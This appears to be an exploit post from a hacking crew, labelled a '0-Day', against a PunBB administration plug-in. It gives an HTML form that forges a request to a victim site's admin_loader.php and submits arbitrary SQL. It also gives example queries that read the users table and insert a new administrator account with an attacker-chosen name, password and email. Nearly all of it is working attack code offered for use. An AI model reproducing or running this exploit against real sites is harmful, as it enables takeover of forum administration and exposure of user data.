######################################################################################
#
#
# Author: Dante90, WaRWolFz
Crew                                                     #
# Title: PunBB (AP_DB_management.php) Remote SQL Injection CSRF By Dante90
[0-Day]   #
# MSN: dante90.dmc4@hotmail.it
#
# Web: www.warwolfz.org
#
#
#
######################################################################################

[0-Day & Priv8] PunBB Administration Plug-In (AP_DB_management.php) Remote
SQL Injection CSRF Exploit By Dante90

[code]

<html>
<head>
    <title>[0-Day & Priv8] PunBB Administration Plug-In
(AP_DB_management.php) Remote SQL Injection CSRF Exploit By Dante90</title>
</head>
<body>
    <center><fieldset>
        <legend>Run SQL query</legend>
        <form name="Dante90" method="post" action="
http://www.victime_site.org/PunBB/admin_loader.php?plugin=AP_DB_management.php
">
            <textarea name="this_query" rows="5" cols="50">

            [SQL_Injection]

            </textarea>
            <input type="submit" name="submit" value="Run query" />
        </form>
    </fieldset></center>
</body>
</html>

[/code]

[SQL_Injection] = Insert the SQL Injection

Example of SQL Injection:

[code]
SELECT * FROM users WHERE id=2;

SELECT * FROM users WHERE group_id=1;

INSERT INTO users (group_id, username, password, email, num_posts,
registration_ip, last_visit) VALUES(1, '[NICK_NEW_ADMIN]',
'md5("[PASSWORD_NEW_ADMIN]")', '[E-MAIL_NEW_ADMIN]', 1, '127.0.0.1',
'1220984516');
[/code]

[NICK_NEW_ADMIN] = New Administrator's Nick

[PASSWORD_NEW_ADMIN] = New Administrator's Password

[E-MAIL_NEW_ADMIN] = New Administrator's E-Mail


Dante90